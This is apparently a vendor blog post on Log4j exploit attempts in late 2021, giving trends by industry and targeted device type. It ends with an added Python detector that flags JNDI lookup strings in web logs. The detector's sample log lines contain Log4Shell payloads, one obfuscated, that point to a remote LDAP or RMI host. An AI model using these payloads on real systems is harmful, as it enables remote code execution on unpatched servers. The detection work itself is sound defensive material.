Dec 30, 2021

Hackers Continue to Exploit Log4j Over The Holidays


Oz Blas and the Armis Research Team contributed to the data in this blog post.


Since the first Log4j vulnerability came to light, security vendors and analysts have published a great deal of guidance on what to do, much of it inconsistent. Vendors and end-user organizations have been scrambling to patch their systems while attackers tested out exploits and launched attacks by the hundreds and thousands. But everyone is still trying to understand how this is impacting organizations around the world.

Exploit Attempts Detected In Almost Half of the Networks

Armis has detected exploit attempts at nearly half of its customer base. Note that Armis detects exploit attempts that made it past the firewall and reached the internal network; these were attempts, not confirmed successful exploitations.

Looking at exploit attempts over time, we saw a very high rate of attempts when the vulnerability was publicly disclosed on December 9, 2021. Since then, the number of attempts has declined, probably because firewalls have been updated and most exploit attempts are now blocked before they reach the network.

Nevertheless, exploit attempts against this vulnerability continue to pass firewalls and may put assets at risk. Image 1 shows that while the overall number of attacks is lower than it was earlier this month, live threats continue to target organizations around the world.


Image 1: Overall exploit attempts detected within customer networks over time.

Exploit Attempts Targeting More Industrial Control Systems and OT Networks

Breaking these numbers down by industry, we find a similar trend: the number of attempts targeting IT networks, OT/ICS networks, and healthcare organizations was higher at first and declined over time.

However, after a week, image 2 shows a significant increase in the number of attacks detected in ICS/OT networks.


Image 2: Attack attempts over time by industry

Most Targeted Devices: Servers and Virtual Machines

Image 3 shows the types of devices that were targeted by attacks. Almost half of these devices were virtual machines, and another 38% of the devices were servers. However, many other types of devices were targeted as well, including personal computers, IP cameras, mobile phones, printers, and more.


Image 3: Most targeted devices across all industries

Industry-Specific IoT, OT, and IoMT Devices Are Targeted As Well

It’s not surprising that in IT environments the most targeted devices include virtual machines, servers, and personal devices. But the list also includes IP cameras, printers, projectors, VoIP devices, and more. These devices are typically difficult to patch because they aren’t always properly managed. However, since they are connected to the network, they may put other assets at risk if compromised. It’s therefore important to include these devices in threat mitigation plans as well.


Image 4: Most targeted devices in IT networks

In OT environments (image 5) we see fewer personal devices targeted, which makes sense as they are often not allowed to connect to the network. However, we do see industry-specific devices such as HMIs, SCADA servers, and engineering workstations under attack.


Image 5: Targeted devices in OT networks

In healthcare and medical environments (image 6), we see a higher share of personal devices being targeted – 18% of the devices targeted, compared to 7% in IT networks and 1% in OT networks. We also see specialized systems such as PACS and imaging workstations being targeted.


Image 6: Targeted devices in medical and healthcare environments

Hackers Will Continue To Attack Our Devices in 2022

We expect to see more attacks targeting organizations in 2022. And while organizations are working furiously to patch vulnerable systems, vulnerable systems will continue to exist in our environments, either because they are difficult to patch or because they can’t be patched at all.

This requires us to keep track of unpatched, vulnerable systems and ensure other protections are in place to prevent exploitation. In addition, it’s important to detect threats targeting these systems in real time so that we can respond properly.
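As an added example of what such real-time detection can look like (this is not Armis code or part of the original post), the Python below scans web access log lines for Log4Shell-style JNDI lookup strings, first unwinding the nested-lookup obfuscations attackers use to hide the literal "jndi"; the log lines are constructed samples and the IP addresses are documentation ranges.

```python
"""Detect Log4Shell-style JNDI lookups in HTTP access log lines (added example,
not Armis code). Log4j resolves nested lookups, so attackers hide the literal
"jndi" behind ${lower:..}, ${upper:..} or ${x:-c}; normalize() unwinds those."""
import re

# Lookups that resolve to one literal character:
#   ${lower:J} -> j   ${upper:n} -> N   ${::-j} -> j   ${env:NOPE:-j} -> j
_CHAR_LOOKUP = re.compile(
    r"\$\{(lower|upper):([^{}$])\}|\$\{[^{}$]*:-([^{}$])\}", re.IGNORECASE
)
# A JNDI lookup naming one of the protocols Log4j's JNDI support accepts.
_JNDI = re.compile(r"\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nis|nds):", re.IGNORECASE)

def _resolve(m):
    if m.group(1):  # ${lower:X} / ${upper:X}
        return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()
    return m.group(3)  # ${...:-X}: the default value X

def normalize(s):
    """Repeatedly collapse single-character lookups until none remain."""
    prev = None
    while prev != s:
        prev, s = s, _CHAR_LOOKUP.sub(_resolve, s)
    return s

def jndi_lookups(line):
    """Return the JNDI protocols (lowercased) found in one log line."""
    return [m.group(1).lower() for m in _JNDI.finditer(normalize(line))]

def scan(lines):
    """Yield (line_number, protocols) for each line carrying an attempt."""
    for n, line in enumerate(lines, 1):
        found = jndi_lookups(line)
        if found:
            yield n, found

# Constructed sample access log, not real traffic (203.0.113.0/24 is TEST-NET-3).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:15:21 +0000] "GET /login HTTP/1.1" 200 88 "-" '
    '"${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [11/Dec/2021:11:02:43 +0000] "GET /api HTTP/1.1" 404 0 "-" '
    '"${${lower:j}${upper:n}${::-d}i:rmi://203.0.113.7:1099/x}"',
    '10.0.0.3 - - [12/Dec/2021:09:00:00 +0000] "GET /docs HTTP/1.1" 200 7 "-" '
    '"price ${env:CURRENCY:-USD} 5"',
]

if __name__ == "__main__":
    for n, protos in scan(SAMPLE_LOG):
        print(f"line {n}: Log4Shell lookup via {', '.join(protos)}")
```

The fourth sample line shows why the normalizer only collapses single-character defaults: a multi-character `${env:X:-USD}` is left alone and does not trigger an alert.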
